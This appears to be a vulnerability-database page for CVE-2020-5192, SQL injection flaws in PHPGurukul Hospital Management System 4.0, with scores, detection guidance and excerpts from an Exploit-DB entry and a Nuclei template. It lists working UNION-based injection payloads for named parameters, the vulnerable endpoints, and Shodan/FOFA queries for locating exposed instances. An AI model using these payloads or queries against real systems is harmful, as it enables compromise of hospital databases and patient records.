CVE-2020-5192
published 2020-01-06CVE-2020-5192: PHPGurukul Hospital Management System in PHP v4.0 suffers from multiple SQL injection vulnerabilities: multiple pages and parameters are not validating user…
PriorityP264high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
16.81%
96.7th percentile
PHPGurukul Hospital Management System in PHP v4.0 suffers from multiple SQL injection vulnerabilities: multiple pages and parameters are not validating user input, and allow for the application's database and information to be fully compromised.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpgurukul | hospital_management_system | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandsearchdata=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvxbq','zIuFTDXhtLrbZmAXQXxIalrRpZgCjsPnduKboFfW'),'qpqjq'),NULL-- PqeG&search=↗
commandviewid=6' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767071,0x7957464b6f4a78624b536a75497051715a71587353746a4b6e45716441646345614f725449555748,0x717a717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- XNyp↗
commandsearchdata='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT(md5({{num}}),1),2),NULL--+PqeG&search=↗
- →Detect UNION-based SQL injection attempts in POST parameter 'searchdata' on /doctor/search.php — look for UNION ALL SELECT with NULL columns and CONCAT payloads ↗
- →Detect boolean-based and time-based blind SQLi in GET parameter 'viewid' on /doctor/view-patient.php — payloads include AND SLEEP(5) and AND <int>=<int> ↗
- →Detect time-based blind SQLi in POST parameter 'bs' — payload contains AND SLEEP(5) injected into medical history submission ↗
- →Detect boolean-based and time-based blind SQLi in POST parameter 'cpass' on /admin/change-password.php — payloads include AND SLEEP(5) and AND <int>=<int># ↗
- →Use Shodan/FOFA to identify exposed Hospital Management System instances as targets: shodan-query 'http.html:"hospital management system"', fofa-query 'body="hospital management system"' ↗
- →Nuclei template detection: POST to /hospital/hms/doctor/search.php with UNION payload and match md5 hash of a known number in the response body confirms exploitation ↗
- →All five vulnerable endpoints require authenticated sessions (doctor or admin login); exploitation is post-authentication (PR:L in CVSS) ↗
- ·The exploit was tested against a local instance at IP 10.0.0.214; the path prefix '/hospital/hospital/hms/' may vary depending on deployment configuration ↗
- ·Back-end DBMS confirmed as MySQL >= 5.0.0 (MariaDB fork); injection techniques and payloads are MySQL-specific (e.g., SLEEP, NULL-based UNION) ↗
- ·Web stack at time of testing was Apache 2.4.41 and PHP 7.4.1; detections tied to this stack may need adjustment for other environments ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Hospital Management System 4.0 - 'searchdata' SQL Injection
exploitdb·2020-01-02·CVSS 8.8
CVE-2020-5192 [HIGH] Hospital Management System 4.0 - 'searchdata' SQL Injection
Hospital Management System 4.0 - 'searchdata' SQL Injection
---
# Exploit Title: Hospital Management System 4.0 - 'searchdata' SQL Injection
# Google Dork: N/A
# Date: 2020-01-02
# Exploit Author: FULLSHADE
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/hospital-management-system-in-php/
# Version: v4.0
# Tested on: Windows
# CVE : CVE-2020-5192
# The Hospital Management System 4.0 web application is vulnerable to
# SQL injection in multiple areas, listed below are 5 of the prominent
# and easy to exploit areas.
================================ 1 - SQLi ================================
POST /hospital/hospital/hms/doctor/search.php HTTP/1.1
Host: 10.0.0.214
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.
Nuclei
Hospital Management System 4.0 - SQL Injection
nuclei·CVSS 8.8
CVE-2020-5192 [HIGH] Hospital Management System 4.0 - SQL Injection
Hospital Management System 4.0 - SQL Injection
Hospital Management System 4.0 contains multiple SQL injection vulnerabilities because multiple pages and parameters do not validate user input. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
Template:
id: CVE-2020-5192
info:
name: Hospital Management System 4.0 - SQL Injection
author: TenBird
severity: high
description: |
Hospital Management System 4.0 contains multiple SQL injection vulnerabilities because multiple pages and parameters do not validate user input. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of t
No writeups or analysis indexed.
2020-01-06
Published